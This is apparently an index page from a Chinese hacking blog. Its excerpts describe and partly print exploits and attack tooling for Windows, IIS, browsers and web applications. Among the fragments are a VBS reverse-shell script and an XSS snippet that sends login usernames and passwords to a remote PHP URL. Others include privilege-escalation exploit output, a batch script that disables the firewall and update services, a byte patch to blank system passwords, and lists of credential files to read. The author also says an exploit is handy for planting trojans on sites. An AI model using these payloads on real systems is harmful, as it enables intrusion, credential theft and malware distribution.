小米手环分析
摘要:
认证很简单,只需要在FF04的UUID中写入20字节的值并校验通过,就可以对手环进行读写指令控制。
其实有个更简单的,只要给Immediate Alert这个属性发送0x01或者0x02即可启动“女性娱乐模式”,不需要任何认证:
(这个属性本来是用来可穿戴设备的找回功能的)
...
阅读全文
Sniffing Proprietary 2.4GHz Signals
摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加变频器,那是极好的,但是我最终需要把所有东西都打包到一个小空间里面。
。。。。。。
阅读全文
打算做个HackRF
摘要:
国外官方是300美元左右,目前买不到,国内有做的,卖2800人民币,买不起。只能自己做了,好几个芯片好贵啊,都上百了。
阅读全文
使用xgoldmon项目调试监控本机通信
摘要:
支持手机(感觉可以把手机设置成MODEM模式支持AT命令的应该都可以)
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
阅读全文
OsmocomBB项目
摘要:
之前看过好多大牛玩osmocomBB项目,改个手机,连电脑,然后编译一堆东西,到最后都是开个console,满屏红红绿绿的文字滚动,看着很吊。
但都不说最终能干啥,滚屏完了就没了,大牛都太低调了,最近有朋友也在搞这个,了解了一下,以下描述都是我最近查阅的大量鸟文资料及少量中文资料之后的理解,如有误望指出。
OsmocomBB是国外一个开源项目,是GSM协议栈(Protocols stack)的开源实现,全称是Open source mobile communication Baseband.目的是要实现手机端从物理层(layer1)到layer3的三层实现。
这里记录一下过程,以便备忘和其它有需要的童鞋少走弯路。
........
阅读全文
Raspberry Pi 增加TFT显示
摘要:
Raspberry Pi是一款基于Linux系统的个人电脑,配备一枚700MHz的处理器,256内存,支持SD卡和Ethernet,拥有两个USB接口,以及 HDMI和RCA输出支持。
有消息称,虽然Raspberry Pi看起来非常的迷你——只有一张信用卡大小,但是它能够运行像《雷神之锤三:竞技场》这样的游戏和进行1080p视频的播放。但是以这次接TFT屏试用结果看,我觉得至少SPI是纯属扯J8蛋,可能HDMI速度快点,但是就以那编译内核的速度来看,并不乐观。
... ...
阅读全文
TVB-Gone 红外编码方法(每次都重新推算一遍,年纪大了还是记录一下吧)
摘要:
每次都重新推算一遍,年纪大了还是记录一下吧(
硬件版的TV-B-Gone的压缩编码跳过此段往下看)
N900上有个TVB-Gone的程序,但是程序的红外编码往往都是对应的国外的电视,好多国产电视都不支持,
有时候需要遥控空调或者投影之类的,只能自己录入了,大概看了一下,编码比较简单(比硬件那个简单多了,毕竟不需要考虑程序空间的问题)
(上次录过一次,这次又重搞一遍,还是记录一下,以备后用。)
。。。
阅读全文
Raspberry Pi 入手安装配置 (有图有真相)
摘要:
托rock的福,跟风败了个Raspberry Pi,(破手机照的,还可以吧 ^_^),安装配置如下:
阅读全文
无线键盘监听(更新 LCD 1602)
摘要:
一个国外的开源项目,通过截获无线键盘发出的信号,来监听键盘按键操作,第一个版本支持监听27MHz的无线键盘,第二个版本支持2.4G的无线键盘监听及注入功能,爽。
以前玩过C51单片机,加上本身自学能力和手工焊接功底不错,磕磕绊绊几个月下来,终于初步完成了这个小玩意。
这次的芯片是ATMEL的MEGA64A,比之前C51系列的又强大、复杂了不少,制作过程中遇到非常多的问题,在这里鄙视一下(强烈地)国内的知识共享精神
…………
阅读全文
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
摘要:
绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
阅读全文
TRS (文本检索系统)注入
摘要:
TRS 是英文Text Retrieval System(文本检索系统)的缩写,据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一,入选2008年度国家规划布局内重点软件企业,做某些渗透经常会碰到。
......
阅读全文
Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload
摘要:
鸟文没太看明白,摸索了一下,$_FILE数组元素解析的问题。
搭个php的环境,目录在C:\www下,根目录下有个upload.php代码如下
......
阅读全文
黑客控制整栋大厦电力系统,改编成游戏!
摘要:
这才是牛逼黑客,控制整栋大厦电力系统,大厦灯光来做背景,改编成游戏!坦克大战~~
.............
阅读全文
以色列人发现的IE 0day (ZT)
摘要:
测试成功,点打印后,会弹出计算器
.........
阅读全文
Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)
摘要:
我的有啥补丁打啥补丁的Win2k3 CN SP1测试成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
阅读全文
WordPress暴绝对路径
摘要:
(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了)
装WordPress顺便看到的
默认plugins目录有hello.php文件,不过好像很多插........
阅读全文
Microsoft Office Snapshot Viewer ActiveX Exploit (可执行版)
摘要:
lcx给的,网上的都是放启动项,这个可以自动执行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
阅读全文
MS08-025 for win2k & win2k3
摘要: Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo
阅读全文
Firefox自定义referer插件(Firefox突破防盗链)
摘要:
RefControl 0.8.10
要是上次找到这个插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盗链和防本地提交是依靠用户浏览器自动提交.......
阅读全文
Firefox突破图片防盗链
摘要: 以下方法修改完后,再刷新本页就能看到上面图片
Firefox:输入about:config进入配置页面,修改network.http.sendRefererHeader的值为1即可(默认是2),
.....
阅读全文
Real Player rmoc3260.dll Exp (老C给的,据说好用)
摘要:
milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real........
阅读全文
简单认识Anti-RootKit(ZT)
摘要: 现在RK(rootkit)和ARK(anti- rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工具是冰刃(IceSword),从冰刃开始出来到现在RK和ARK的斗争一直在继续,目前冰刃还是在流行当中,自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵,现在很多病毒木马已经广泛的带有驱动,使用一些RK的技术和方法使自己更底层些更强大些,当前流行的ARK工具主要包括:隐藏进程检测,内核驱动检测,SSDT检测,代码HOOK检测,注册表隐藏的检测,隐藏文件的检测等一些功能的,下面谈谈自己对一些功能的简单愚见 嘻嘻。
..........
阅读全文
无耻的驱动加载法(ZT)
摘要: 方法一: 替换win32k.sys
在2k3的系统下ZwSetSystemInformation禁止了用户模式下加载驱动,只允许SMSS.exe加载win32k.sys。于是我们可以利用一下这个特点:
1. 注入SMSS.EXE
2. 打开SeLoadDriverPrivilege权限
3. 把原始的win32k.sys改名
4. 复制我们的驱动到\systemroot\system32下
5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文件改名改回去
..............
阅读全文
实例解析蠕虫病毒的原理(ZT)
摘要: 一、蠕虫病毒具有自我复制能力
我们以普通的VB脚本为例来看看:
JavaScript代码
1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '创建一个文件系统对象
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通过文件系统对象的方法创建了一个TXT文件。
.....................
阅读全文
软件漏洞分析入门[初级shellcode_定位缓冲区](ZT)
摘要: 跟贴中看到已经有不少朋友成功的完成了前面的所有例题,今天我们在前面的基础上,继续深入。每一讲我都会引入一些新的知识和技术,但只有一点点,因为我希望在您读完贴之后就能立刻消化吸收,这是标准的循序渐进的案例式学习方法
另外在今天开始之前,我顺便说一下后面的教学计划:
我会再用3~4次的讲座来阐述shellcode技术,确保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用程序(exploit)
..........
阅读全文
软件漏洞分析入门[初级栈溢出D_植入任意代码](ZT)
摘要: 麻雀虽小,五脏俱全
如果您顺利的学完了前面4讲的内容,并成功的完成了第2讲和第4讲中的实验,那么今天请跟我来一起挑战一下劫持有漏洞的进程,并向其植入恶意代码的实验,相信您成功完成这个实验后,学习的兴趣和自信心都会暴增。
开始之前,先简要的回答一下前几讲跟贴中提出的问题
代码编译少头文件问题:可能是个人习惯问题,哪怕几行长的程序我也会丢到project里去build,而不是用cl,所以没有注意细节。如果你们嫌麻烦,不如和我一样用project来build,应该没有问题的。否则的话,实验用的程序实在太简单了,这么一点小问题自己决绝吧。另外,看到几个同学说为了实验,专门恢复了古老的VC6.0,我也感动不已啊,呵呵。
...............
阅读全文
软件漏洞分析入门[初级栈溢出C_修改程序流程](ZT)
摘要: 上节课没有操练滴东西,不少蠢蠢欲动的同学肯定已经坐不住了。悟空,不要猴急,下面的两堂课都是实践课,用来在实践中深入体会上节课中的知识,并且很有趣味性哦
信息安全技术是一个对技术性要求极高的领域,除了扎实的计算机理论基础外、更重要的是优秀的动手实践能力。在我看来,不懂二进制就无从谈起安全技术。
缓冲区溢出的概念我若干年前已经了然于胸,不就是淹个返回地址把CPU指到缓冲区的shellcode去么。然而当我开始动手实践的时候,才发现实际中的情况远远比原理复杂。
................
阅读全文
软件漏洞分析入门[初级栈溢出B_系统栈原理](ZT)
摘要: 扫盲班第三讲开课啦!
上节课我们用越过数组边界的一个字节把邻接的标志变量修改成0,从而突破了密码验证程序。您实验成功了吗?没有的话回去做完实验在来听今天的课!
有几个同学反映编译器的问题,我还是建议用VC6.0,因为它build出来的PE最适合初学者领会概念。而且这门课动手很重要,基本上我的实验指导都是按VC6.0来写的,用别的build出来要是有点出入,实验不成功的话会损失学习积极性滴——实验获得的成就感是学习最好的动力。
............
阅读全文
软件漏洞分析入门[初级栈溢出A_初识数组越界](ZT)
摘要: 本想来点大道理申明下研究思路啥的,看到大家的热情期待,稍微调整一下讲课的顺序。从今天开始,将用3~4次给大家做一下栈溢出的扫盲。
栈溢出的文章网上还是有不少的(其实优秀的也就两三篇),原理也不难,读过基本上就能够明白是怎么回事。本次讲解将主要集中在动手调试方面,更加着重实践。
经过这3~4次的栈溢出扫盲,我们的目标是:
领会栈溢出攻击的基本原理
能够动手调试简易的栈溢出漏洞程序,并能够利用漏洞执行任意代码(最简易的shellcode)
.............
阅读全文
软件漏洞分析入门[引子](ZT)
摘要: 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤?
从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞的研究价值,研究方法,堆栈利用的基础知识,shellcode的调试方法,漏洞调试方法,漏洞分析,漏洞挖掘,软件安全性测试等等,此外还将介绍一些metasploit架构和fuzz测试方面的入门知识。
软件漏洞分析,利用,发掘是当今安全技术界中流砥柱级别话题,如果您关注过black hat或者defcon之类的顶级安全技术峰会的话,就知道我不是在吹牛了。可惜的是这方面的中文资料很少,偶尔有一篇比较优秀的文章但又不够系统,目前为止也没有形成像破解技术这样的讨论风气,菜鸟们在黑灯瞎火的夜晚瞎折腾,没有交流和指导,兴趣就像被拔了气弥儿芯的车胎,很快就泄气了。
虽然漏洞分析与利用与破解在技术上各有侧重点,但逆向基础是共同的。以我个人的经验,能做crack的朋友只要稍加进修就能入门。就算没有任何汇编基础和逆向经验的朋友也不用担心,因为这
阅读全文
TCP版backshell的VBS脚本
摘要: '搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, baicker@hotmail.com
'date:071221
Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................
阅读全文
Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp & win2k3
摘要: secdrv local exp
winxp cn sp2, win2k3 cn sp1 测试通过
之前的版本只能xp下用,这个2k3也可以了,其实前段时间朋友给过我一个这个漏洞的1day,但是朋友的东西不能乱发,这个是自己写的,发出来大家恶心一下。
阅读全文
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability for xp 2k3
摘要: Win2k3_CN SP1 msjet40.dll ver 4.0.9025.0 测试成功
WinXP_CN SP2 msjet40.dll ver 4.0.8618.0 测试成功
mdb_d_exp.exe 为debug版本
mdb_r_exp.exe 为relrease版本
之前的反弹sc有问题,请重新下载测试(071218)
阅读全文
MS07-017 windows 2000 and windows xp sp2 真正修改能用版本(fixed)
摘要: 注:Windows2000_CN SP2(我只有这台SP2的2k测试机),WindowsXP_CN SP2测试通过
网上流传的都TMD垃圾不能用,不知道抄来抄去转来转去哪些代码转错了
这个是我自己修改过的
阅读全文
迅雷5 0day 利用工具
摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响
挂马相当好用,只是如果用iframe,宽高不能为0
(pplayer.dll 组件版本号:1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)
阅读全文
JavaScript加密解密7种方法
摘要: 本文一共介绍了七种javascript加密方法:
在做网页时(其实是网页木马呵呵),最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的javascript代码常常被别人轻易的拷贝,实在让自己的心里有点不是滋味,要知道自己写点东西也挺累的......^*^
但我们也应该清楚地认识到因为javascript代码是在IE中解释执行,要想绝对的保密是不可能的,我们要做的就是尽可能的增大拷贝者复制的难度,让他知难而退(但愿~!~),下面我结合自己这几年来的实践,及个人研究的心得,和大家一起来探讨一下网页中javascript代码的加密解密技术。
以加密下面的javascript代码为例:
......
阅读全文
autorun.inf完全操作手册(ZT)
摘要: 一、autorun.inf是windows下操纵光盘行为的一个文件,需要放在光盘根目录下,部分操作对于硬盘也适用。
二、autorun.inf是可以被禁止的。方法如下:
点击开始->运行,在文本框中输入regedit或者regedt32。依次展开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer,其中的NoDriveTypeAutoRun子键限制着Autorun的作用范围,默认为95(16进制)。
................
阅读全文
一些XSS小技巧(ZT)
摘要: 1.最短的动态插入JS.
代码:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>
2.获取表单密码.
代码:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......
阅读全文
完整XSS wrom入侵流程(ZT)
摘要: 不说废话,且看怎么实现,我先拿SOHU BLOG做示范.
1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些.
’’;:!--"<javascript JAvaSCriPT>={()} \/
结果
’’;:!--"={()} // (&后是amp,论坛过滤了)
.........
阅读全文
一个简单的Linux内核后门原型(ZT)
摘要: 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
阅读全文
VBS解决终端窗口中特殊快捷键问题
摘要: 写程序麻烦,还要传上去,幸好VBS每台服务器应该都可以运行的吧,很少会又禁止的
使用SendKeys搞定
例如呼出Cain使用果如下脚本:)
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"
以下位SendKeys的相关使用方法等
............
阅读全文
一些opcodes(ZT)
摘要:
一些opcodes
by axis
2007-03-28
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
简体中文windows的通用跳转地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
阅读全文
利用Radmin漏洞修改的Hash登录版本
摘要: 更新:上次比较匆忙,有个函数没改好,今天才可以上网,现在没问题了
前段时间出了个radmin的算是技巧吧(http://www.blogjava.net/baicker/archive/2007/09/12/144609.html),以前也有过这个想法,只是没有去研究,这次索性修改了下源文件,直接改成利用hash登录的版本,省得每次带个od跑,针对屏幕相关的似乎不行,不过已经够用了呵呵
注:hash用小写字母(懒得改了)
http://www.blogjava.net/Files/baicker/Radmin_Hash.rar
阅读全文
Technical explanation of The MySpace Worm
摘要: Please note that this code and explanation was only released AFTER MySpace resolved this.
None of this would work on MySpace at the time it was released and it will not work now. Otherwise, there would have been mayhem.
Now, let's talk more about the problems encountered, workarounds, and how it worked in general.
1) Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They would
阅读全文
Radmin密码破解新招(以前也有过这个想法,懒得去做)
摘要: Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位md5加密后
存放在注册表里的
具体的表键值为 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\
那在攻陷一台web服务器时 大家 怎么能进一步提权?
如果你说 暴力破解 radmin 密码 呵呵 那也行
只不过 你要有足够的时间 跟精力
我想很少人 花上几星期 几月 甚至几年 去破解那个密码
............
阅读全文
绕过堆栈保护 编写shellcode(FY)
摘要: 概述
在本例中,我们来实际编写一个可以在使用堆栈保护的系统中执行的shellcode。该shellcode通过利用ntdll.dll的部分指令跳转到我们的代码执行。在大多数的dll中都可以实现此方法,而且可以完全饶过堆栈保护机制,因为通过此方法并没有任何代码在堆栈非执行区域中执行。
详述
我们也许都听说过堆栈保护这么一个词。很多安全程序提供了对堆栈中的代码执行的保护功能(译者注:原文这里用的是“protect”,其实我个人认为用 “disallow”或者“disable”更确切的。因为这类所谓的堆栈保护,其实就是禁止代码在堆栈中执行。)。一些新的硬件产品也具有禁止代码在 “非执行”内存区域中执行(比如AMD64)。然而编写一个饶过此机制的shellcode并不是件难事,下面我给大家简单的介绍一下。
方法就是使用dll的部分代码来达到我们的目的。如何做到呢?首先在堆栈发生溢出的时候我们将返回地址设置成ntdll.dll中的某个指令地址,我们要利用的ntdll的部分代码如下:
.............
阅读全文
教你如何分析未文档化的数据结构(ZT)
摘要: Editor:admin Time:2005-8-20 23:22 Read:9985 Score:8 Print
Writer:HSLY
Excerpt:80x86汇编小站
Preface:
分享逆向技术心德......
Content:
[标题] 教你如何分析未文档化的数据结构
[作者] hsly110 或者 猪头三
[个人网站] http://www.x86asm.com 80x86汇编小站
[Email] pliceman_110@163.com PS:本文如果有错漏请来信指出
[范围] 逆向工程
[目的] 分享逆向技术心德
[目标API] 未文档化的RtlInitializeGenericTable
[参考文献] Secrets of Reverse Engineering
..........
阅读全文
load_file()函数查看常用配置文件
摘要: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/my.cnf //mysql的配置文件
/etc/issue //系统版本
/etc/issue.net
/etc/redhat-release
C:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/etc/sysconfig/iptables //从中得到防火墙规则策略
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Serv-U\Serv
阅读全文
Terminal Services: reset Sessions
摘要:
The problem: you use terminal services in administration mode (which allows 2 sessions), now you cannot connect to the server because all sessions are used.
Windows 2000+ (includes Windows XP and 2003) have two command-line tools called qwinsta and rwinsta that can query and reset a remote session.
Query a server:
> qwinsta /server:192.168.12.12
.......
阅读全文
Use CDO.Message (cdosys.dll) to send an SMTP Mail with importance (as a VBS Script)
摘要:
I had to create a .VBS script to create an automated E-Mail message. The hardest part was to set the importance of the mail, I've found the solution here: http://www.lewisroberts.com/?p=64
Here come's the script:
Dim iMsg
Dim iConf
Dim Flds
Dim strHTML
............
阅读全文
Terminal Service: Connect and/or Shadow to a Console Session...
摘要: Terminal Service: Connect and/or Shadow to a Console Session...
crosspost from http://blogs.msdn.com/rextang
Seems some of my friends still didn't know how to use Microsoft Terminal Service Client to connect to the console session of a windows pc (server or client OS) so here is a memo for it also during the search I found the other interesting thing that can let Terminal Service to function like a VNC server (2 users share the same session, called "shadow session" here).
.....
阅读全文
Cookie注入手工检测方法
摘要: 例:
http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("1 and 1=1"))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。
..........
阅读全文
实用级反主动防御rootkit设计思路(ZT)
摘要:
目录:
反主动防御rootkit的产生背景及其必要性
反网络访问主动防御
反API钩子进程行为主动防御
反系统Notify进程行为主动防御
绕过监控进入ring0安装驱动
实用级反主动防御rootkit的通用性问题
..............
阅读全文
关于PE可执行文件的修改(ZT)
摘要: 1、PE文件框架构成
DOS MZ header
DOS stub
PE header
Section table
Section 1
Section 2
Section ...
Section n
上表是PE文件结构的总体层次分布。所有 PE文件(甚至32位的 DLLs) 必须以一个简单的 DOS MZ header 开始,在偏移0处有DOS下可执行文件的“MZ标志”,有了它,一旦程序在DOS下执行,DOS就能识别出这是有效的执行体,然后运行紧随 MZ header 之后的 DOS stub。DOS stub实际上是个有效的EXE,在不支持 PE文件格式的操作系统中,它将简单显示一个错误提示,类似于字符串 " This program cannot run in DOS mode " 或者程序员可根据自己的意图实现完整的 DOS代码。通常DOS stub由汇编器/编译器自动生成,对我们的用处不是很大,它简单调用中断21h服务9来显示字符串"This program cannot run in DOS mode"。
阅读全文
扭曲变换加密(ZT)
摘要:
一,一般来讲,加密就是加壳
我们经常考虑,一个可执行文件,怎么样加密才能安全呢?
一般用的手段,是加壳。加壳工具的工作原理,就是把可执行文件的代码与
数据都进行加密变换,作为数据存放。生成的目标文件入口代码是加壳软件
准备好的防跟踪代码。经过漫长的防跟踪代码后,会把原始可执行文件的代码
与数据段恢复,然后跳转到原来的入口处,继续运行。这样做的缺点是,不管
你的加密多强,防跟踪代码多牛,只要一运行,在内存中就全部恢复了。只要
把内存映象dump下来,反汇编一下,就清清楚楚了。甚至有工具可以直接把
dump下来的内存映象存为可执行文件。这样加密就彻底失败了。
......
阅读全文
OllyDbg Format String 0day分析和利用(ZT)
摘要:
OD作为一款Ring3下的调试器以优异的性能博得了广大密界爱好者的一致肯定,就在最近milw0rm上公布了一个OD 0 day的POC(OllyDbg v110 Local Format String Exploit),以前写了很多栈溢出的漏洞,却很少有Format String的漏洞,这次OD给我们提供了一个熟悉Format String问题的机会(只有原版的OD存在此问题,看雪论坛的修改版OllyIce不存在此问题)。
........
阅读全文
“黑客之门”后门的魅力(ZT)
摘要: “黑客之门”介绍
黑客之门采用的目前一些先进的后门技术,它只有一个Dll文件,通过感染系统文件启动自身,被感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;本身不开端口,而是重用系统进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性非常好,而且穿透防火墙也是很容易的事。这个版本文件不大,只提供一些很有用的命令。目前还没有发现如何工具能查到这个后门,象Fport,Llister,RKDetector等查工具都失效。
程序的自启动
既然是一个后门,那么就要随系统的启动而启动,根据黑客之门的介绍,它是通过感染系统程序文件来实现程序的自启动的。既然是感染了系统文件(像病毒),那就看看感染前和感染后的系统文件的区别吧!为了测试感染前后的差别,我准备了一个专门用来被感染的文件TestLoad.exe,它没有什么功能,只是弹出一个对话框,这样好等待测试,麻雀虽小,五脏俱全,省得动系统文件了。接着运行命令:
...................
阅读全文
破解所谓的“网页源代码加密”
摘要: 之前见过这段代码,觉得用view-source就可以了就没记,现在这招不好用了,前段时间死活找不到这段代码,这回不能放过了
在地址栏或按Ctrl+O,输入:
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
.............
阅读全文
关闭SFC[文件保护]的源代码(ZT)
摘要: WindowsXP Professional SP2测试通过.
.386
.Model Flat,StdCall
Option CaseMap :None
Include \Masm32\Include\Windows.inc
Include \Masm32\Include\User32.inc
Include \Masm32\Include\Shell32.inc
Include \Masm32\Include\Kernel32.inc
Include \Masm32\Include\Advapi32.inc
..........
阅读全文
编程禁止Windows文件保护(ZT)
摘要: 这里要用到一个未公开的API——SfcFileException,其声明如下:
代码:
DWORD WINAPI SfcFileException(DWORD dwUnknown0, PWCHAR pwszFile, DWORD dwUnknown1);
参数说明: dwUnknown0 未知,设为0
pwszFile 文件名
dwUnknown1 未知,设为-1
...........
阅读全文
清空系统密码(ZT)
摘要: 这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上..
system32下 有个msv1_0.dll
xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D
2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF
阅读全文
去除OmniPeek发包不能伪造源MAC的限制(ZT)
摘要: --------------------------------------------------------------------------
目录:
☆ 去除OmniPeek发包不能伪造源MAC的限制
☆ 参考资源
--------------------------------------------------------------------------
☆ 去除OmniPeek发包不能伪造源MAC的限制
1259@netexpert发了个贴,说OmniPeek发包时不能伪造源MAC,即使在数据窗口中指
定了虚假MAC,发送出去时也被自动修正成真实源MAC。而Sniffer Pro没有这个限制。
finger@netexpert测试了一番,证实了这个说法。我乍一看到还不很信,也测试了一
番,果然。WildPackets为什么要加这个限制,懒得深究了,于我看来无非是些掩耳
盗铃之举。反正这个限制我不想要。去除这个限制也很简单,下
阅读全文
启动项新思路
摘要: 前几天我看了一篇技术文章,是讲述一种病毒的感染运行机制。原文中提到了一个木马启动的新的思路。(文章是两年前的,唉,看来我们要学的东西好多阿)也许某些 ~高手已经会了,但是很多人也不知道。我整理出来,结合我自己的试验,给大家简单介绍一下。作为一个小教程,本文不涉及程序方面的知识,菜鸟老鸟都能看明白的。暂时我们只针对XP和2000系统。其他的系统我没测试过,不敢乱说!
一般大家机器里都会有QQ吧,我们就用QQ来做试验!!?
直接在开始菜单里找到运行栏,输入regedit,打开注册表编辑器。找到
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
.........
阅读全文
利用ORACLE系统账户默认口令提升权限(ZT)
摘要:
近日,偶到一主机上逛了一圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。
接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。从user\程序目录里,发现有一快捷方式:firecontrol,好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务,发现一般的可提权的方法都不可行,无SERV-U等等,主机的补丁也是打到了最新。试了下传了个NC上去,反连接得到一SHELL,这下比在老兵的管理器里舒服多了。
在C盘下看到一个目录oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了主机的服务名“xxx”,看了下版本“oracle 8i”,用数据库连接器
.............
阅读全文
命令行添加程序到windows默认防火墙
摘要: @echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
阅读全文
“PE文件格式”1.9版 完整译文(附注释)
摘要: 标 题: 【翻译】“PE文件格式”1.9版 完整译文(附注释)
作 者: ah007
时 间: 2006-02-28,13:32
链 接: http://bbs.pediy.com/showthread.php?threadid=21932
$Id: pe.txt,v 1.9 1999/03/20 23:55:09 LUEVELSMEYER Exp $
PE文件格式系列译文之一----
【翻译】“PE文件格式”1.9版 完整译文(附注释)
=========================================================
原著:Bernd. Luevelsmeyer
翻译:ah007
[注意:本译文的所有大小标题序号都是译者添加,以方便大家阅读。圆圈内的数字是注释的编号,其中注释②译自微软的《PECOFF规范》,其它译自网络。----译者]
.........
阅读全文
脚本加密方法大全(ZT)
摘要: 本文一共介绍了七种方法:
一:最简单的加密解密
二:转义字符"\"的妙用
三:使用Microsoft出品的脚本编码器Script Encoder来进行编码 (自创简单解码)
四:任意添加NUL空字符(十六进制00H) (自创)
...................
阅读全文
一些opcodes(ZT)
摘要: 近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
简体中文windows的通用跳转地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
